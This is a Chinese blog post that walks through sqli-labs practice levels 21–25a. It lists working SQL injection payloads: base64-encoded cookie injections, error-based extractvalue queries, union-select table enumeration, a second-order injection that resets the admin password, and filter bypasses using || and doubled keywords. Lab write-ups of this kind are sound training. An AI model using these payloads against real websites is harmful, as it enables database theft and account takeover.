sqli-labs闯关记录(Less21-Less25)

tech2026-04-19  3

Advanced Injections

Less-21 Cookie Injection- Error Based- complex - stringLess-22 Cookie Injection- Error Based- Double Quotes - stringLess-23 Error Based- no commentsLess-24 Second Degree InjectionsLess-25 Trick with OR & ANDLess-25a Trick with OR & AND Blind

Less-21 Cookie Injection- Error Based- complex - string

同样是cookie,不同的是使用base64加密 payload:abc')and extractvalue(0x7e,concat(0x7e,user(),0x7e))# 加密后:YWJjJylhbmQgZXh0cmFjdHZhbHVlKDB4N2UsY29uY2F0KDB4N2UsdXNlcigpLDB4N2UpKSM=

Less-22 Cookie Injection- Error Based- Double Quotes - string

payload:abc"and extractvalue(0x7e,concat(0x7e,database(),0x7e))# 加密后:YWJjImFuZCBleHRyYWN0dmFsdWUoMHg3ZSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpLDB4N2UpKSM=

Less-23 Error Based- no comments

payload:id=-1' union select 1,(database()),3'

payload:id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3'

Less-24 Second Degree Injections

现在数据库中并没有admin’#这个账户 在网站上注册了一个admin’#的账户

登录admin’#以后,修改密码,修改完成以后发现admin的密码被修改了。 大佬的解释:本关为二次排序注入的示范例。二次排序注入也成为存储型的注入,就是将可能导致 sql 注入的字符先存入到数据库中,当再次调用这个恶意构造的字符时,就可以出发 sql 注入。

Less-25 Trick with OR & AND

payload:id=1' || extractvalue(0x7e,concat(0x7e,database(),0x7e))-- + 题目提示了or和and被过滤

Less-25a Trick with OR & AND Blind

payload:-1 union select 1,(select group_concat(table_name)from infoorrmation_schema.tables where table_schema='security'),3%23 使用双写绕过代码的过滤

最新回复(0)